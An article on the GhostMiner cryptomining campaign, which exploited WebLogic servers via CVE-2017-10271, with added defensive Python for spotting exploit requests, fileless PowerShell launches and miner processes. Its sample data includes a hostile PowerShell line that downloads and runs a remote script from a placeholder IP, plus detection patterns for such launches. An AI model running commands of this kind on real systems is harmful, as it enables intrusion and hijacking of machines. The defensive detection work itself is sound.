Cryptojacking, in which attackers hijack other people's computing resources to mine digital currency, has become routine. Mining cryptocurrency profitably requires a large amount of hardware power, which is exactly what the attackers are after. Security researchers recently found a cryptojacking campaign, GhostMiner, that used advanced techniques to mine more efficiently, yet the effort was largely in vain.
Researchers at Minerva Labs discovered this new strain of crypto-mining malware, which uses PowerShell code to achieve fileless execution and disables other mining programs on the host so that it can claim as much of the machine as possible. Despite all that ingenuity, the creator(s) of the miner earned merely about $200.
According to the researchers, after a week-long campaign the operation, codenamed “GhostMiner”, had earned only 1.03 Monero. That is tiny compared with the roughly $3 million that attackers earned by exploiting the Jenkins RCE flaw.
GhostMiner's advanced tricks
Although the outcome sounds almost comical, and a little sad, GhostMiner is more than a joke. Its failure to make money says nothing about the severity of the threat this campaign poses.
GhostMiner stands out for its use of a fileless execution technique. Fileless execution, which has been on the rise in malware in recent years, runs a program directly in memory instead of leaving a file on disk, which leaves most classic file-scanning antivirus products blind to it. The activity is still visible, though, in PowerShell script block logging and in the command lines of the powershell.exe processes that host it, so that is where defenders should look. The technique itself is not new, but its use in GhostMiner shows that the campaign's creator(s) put considerable effort into it.
GhostMiner targets several kinds of server
Mining needs hardware to run on. GhostMiner targets phpMyAdmin, MS SQL, and Oracle WebLogic servers, although according to the Minerva Labs analysts the campaign was only active against Oracle WebLogic servers during their investigation.
GhostMiner scans random IP addresses for WebLogic servers and gains access by exploiting CVE-2017-10271. Once a system is compromised, the program runs two PowerShell scripts to launch itself in fileless mode, then downloads the additional mining components and a self-defense mechanism.
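The two stages described above leave traces a defender can search for even when nothing touches disk: the exploit arrives as a POST to the WLS-WSAT endpoints of the WebLogic server, and the fileless stage shows up in the command line of the powershell.exe process that hosts it. The following Python is an added example written for this article, not code from GhostMiner or from Minerva Labs; the access-log lines, the PowerShell command lines, the IP addresses, and the indicator weights and threshold are all constructed for illustration.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample WebLogic HTTP access-log lines (not taken from the campaign).
# The vulnerable component behind CVE-2017-10271 is WLS-WSAT, so unsolicited
# POSTs to /wls-wsat/* are the first thing to look for on a WebLogic host.
SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [14/Mar/2018:10:02:11 +0000] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 3311
198.51.100.23 - - [14/Mar/2018:10:02:15 +0000] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 500 1205
198.51.100.23 - - [14/Mar/2018:10:02:16 +0000] "POST /wls-wsat/RegistrationPortTypeRPC HTTP/1.1" 500 1205
203.0.113.7 - - [14/Mar/2018:10:03:40 +0000] "GET /app/index.jsp HTTP/1.1" 200 884
"""

# Constructed sample powershell.exe command lines as they would appear in
# process-creation telemetry (Sysmon event 1 or Windows event 4688). The
# -Enc payload is a truncated, made-up base64 blob, not the campaign's.
SAMPLE_CMDLINES = [
    "powershell.exe -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA",
    "powershell.exe -nop -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/x.ps1')\"",
    r"powershell.exe -ExecutionPolicy RemoteSigned -File C:\Scripts\nightly-backup.ps1",
]

# Common log format: ip ident user [timestamp] "method path proto" status size
ACCESS_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def find_wls_wsat_posts(log_text: str) -> List[Dict[str, str]]:
    """Return access-log entries that POST to the WLS-WSAT endpoints that
    CVE-2017-10271 exploitation goes through."""
    hits = []
    for line in log_text.splitlines():
        m = ACCESS_RE.match(line)
        if m and m.group("method") == "POST" and m.group("path").lower().startswith("/wls-wsat/"):
            hits.append(m.groupdict())
    return hits


# Weighted indicators (weights are an assumption) that a PowerShell launch
# stages its payload in memory rather than running a script file from disk.
FILELESS_INDICATORS: List[Tuple[re.Pattern, int, str]] = [
    (re.compile(r"-e(ncodedcommand|nc)?\b\s+[A-Za-z0-9+/=]{20,}", re.I), 3, "encoded command"),
    (re.compile(r"\b(iex|invoke-expression)\b", re.I), 2, "Invoke-Expression"),
    (re.compile(r"downloadstring|downloaddata|invoke-webrequest|net\.webclient", re.I), 2, "download-to-memory"),
    (re.compile(r"frombase64string", re.I), 2, "base64 decode"),
    (re.compile(r"-w(indowstyle)?\s+hidden", re.I), 1, "hidden window"),
    (re.compile(r"-nop(rofile)?\b", re.I), 1, "no profile"),
    (re.compile(r"-ep\s+bypass|-executionpolicy\s+bypass", re.I), 1, "execution policy bypass"),
]


def score_powershell_cmdline(cmdline: str) -> Tuple[int, List[str]]:
    """Sum the weights of every indicator present in the command line and
    return the total together with the names of the indicators that fired."""
    matched = [(w, label) for rx, w, label in FILELESS_INDICATORS if rx.search(cmdline)]
    return sum(w for w, _ in matched), [label for _, label in matched]


def is_fileless_launch(cmdline: str, threshold: int = 4) -> bool:
    """Threshold of 4 (an assumption) requires more than one weak indicator."""
    return score_powershell_cmdline(cmdline)[0] >= threshold


if __name__ == "__main__":
    for hit in find_wls_wsat_posts(SAMPLE_ACCESS_LOG):
        print(f"[wls-wsat] {hit['ip']} {hit['method']} {hit['path']} -> {hit['status']}")
    for cmd in SAMPLE_CMDLINES:
        score, labels = score_powershell_cmdline(cmd)
        flag = "SUSPECT" if is_fileless_launch(cmd) else "ok"
        print(f"[powershell] {flag:7} score={score} {labels} :: {cmd[:60]}")
```

Run it as-is to see the two WLS-WSAT POSTs and the two suspicious launches flagged while the scheduled backup script passes. The scoring is deliberately conservative: a single `-NoProfile` is normal administration, but an encoded command combined with a hidden window, or an `IEX` of a `DownloadString`, is the pattern the article describes.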
GhostMiner also carries a large list of other mining programs that might already be running on the system. The malware scans the host for those processes and terminates them to free up more hardware resources for itself.
GhostMiner was not the only campaign targeting Oracle WebLogic servers; one of the others earned around $226,000.
Thanks to GhostMiner's creator(s), security researchers have turned the list of mining software found in GhostMiner into a PowerShell script that removes all currently known coin-mining processes. The script is available on GitHub.
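The kill-list idea works both ways: the same hunt that GhostMiner uses to evict rival miners is what the researchers' script uses to evict GhostMiner. The Python below is an added example written for this article; it is neither GhostMiner's code nor the Minerva Labs PowerShell script from GitHub. The process snapshot, the short list of miner executable names, the command-line indicators and the CPU threshold are all constructed or assumed for illustration. It goes one step beyond a name-only list by also matching the command-line traits a miner keeps after it has been renamed to look like a Windows binary, while refusing to flag a busy but legitimate process on CPU load alone.

```python
import os
import re
import signal
from dataclasses import dataclass
from typing import Dict, List


@dataclass
class Proc:
    pid: int
    name: str
    cmdline: str
    cpu_percent: float  # recent sustained CPU use, 0-100


# Constructed process snapshot (not real telemetry). 6201 is a miner renamed to
# a Windows binary name; 7010 is the WebLogic JVM itself, busy but legitimate.
SAMPLE_PROCS = [
    Proc(4120, "xmrig.exe",
         "xmrig.exe -o stratum+tcp://pool.example.net:3333 -u WALLET_ADDRESS -p x --donate-level 1", 97.0),
    Proc(5532, "svchost.exe", "svchost.exe -k netsvcs", 1.2),
    Proc(6201, "dllhost.exe",
         "dllhost.exe -a cryptonight -o pool.example.org:5555 -u WALLET_ADDRESS -p x", 91.5),
    Proc(7010, "java.exe", "java.exe -Dweblogic.Name=AdminServer weblogic.Server", 88.0),
]

# Illustrative subset of miner executable names; GhostMiner's own list is much
# longer and is not reproduced here.
KNOWN_MINER_NAMES = {"xmrig.exe", "xmr-stak.exe", "minerd.exe", "cpuminer.exe", "ccminer.exe"}

# Command-line traits a miner keeps even after the binary is renamed.
CMDLINE_INDICATORS = [
    (re.compile(r"stratum\+(tcp|ssl)://", re.I), "stratum pool URL"),
    (re.compile(r"--donate-level", re.I), "--donate-level"),
    (re.compile(r"(^|\s)(-a|--algo)[= ]cryptonight", re.I), "cryptonight algorithm"),
    (re.compile(r"(^|\s)(-o|--url)[= ]\S+:\d{2,5}\b", re.I), "pool host:port"),
]


def classify(proc: Proc, cpu_threshold: float = 80.0) -> List[str]:
    """Return the reasons a process looks like a coin miner (empty if none)."""
    reasons = []
    if proc.name.lower() in KNOWN_MINER_NAMES:
        reasons.append("known miner name")
    for rx, label in CMDLINE_INDICATORS:
        if rx.search(proc.cmdline):
            reasons.append(label)
    # CPU load alone is not evidence (an app server under load looks the same),
    # so it only strengthens a verdict that already has a miner indicator.
    if reasons and proc.cpu_percent >= cpu_threshold:
        reasons.append("sustained high CPU")
    return reasons


def hunt(procs: List[Proc]) -> Dict[int, List[str]]:
    """Map pid -> reasons for every process that has at least one indicator."""
    result = {}
    for p in procs:
        reasons = classify(p)
        if reasons:
            result[p.pid] = reasons
    return result


def terminate(pids, dry_run: bool = True) -> List[int]:
    """Kill the given pids; dry_run only reports what would be killed."""
    handled = []
    for pid in pids:
        if dry_run:
            print(f"would terminate pid {pid}")
        else:
            os.kill(pid, signal.SIGTERM)  # on Windows this ends up in TerminateProcess
        handled.append(pid)
    return handled


if __name__ == "__main__":
    verdicts = hunt(SAMPLE_PROCS)
    for pid, reasons in verdicts.items():
        print(f"pid {pid}: {', '.join(reasons)}")
    terminate(sorted(verdicts))  # dry run; pass dry_run=False to actually kill
```

On a live host the snapshot would come from `tasklist /V`, WMI, or Sysmon process-creation events rather than the constructed list, and a real deployment should also remove whatever scheduled task or WMI subscription relaunches the miner, otherwise the kill is only temporary.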